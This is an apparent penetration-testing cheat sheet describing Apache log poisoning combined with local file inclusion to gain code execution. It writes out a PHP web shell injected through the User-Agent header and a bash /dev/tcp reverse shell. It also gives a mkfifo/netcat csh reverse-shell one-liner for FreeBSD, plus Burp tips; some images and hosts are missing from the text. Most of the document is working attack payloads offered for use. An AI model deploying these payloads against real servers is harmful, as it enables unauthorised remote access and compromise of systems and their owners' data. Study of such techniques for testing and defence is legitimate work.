Apache log

Example from

Url exposing apache log files:

Error message when contaminating the log with:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>

Second try (reason for error message was that " character could not be processes by the log file). Changing to :

User-Agent: <?php system($_REQUEST['cmd']); ?>

We gain code execution through LFI:

The same request in Burp (useful when log files are full of data)

Gaining a reverse shell from FreeBSD through LFI with:

if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!

Make sure you URL encode the command in Burp before sending:



‚ÄčShellpop - allowed me to construct the reverse shell for freeBSD.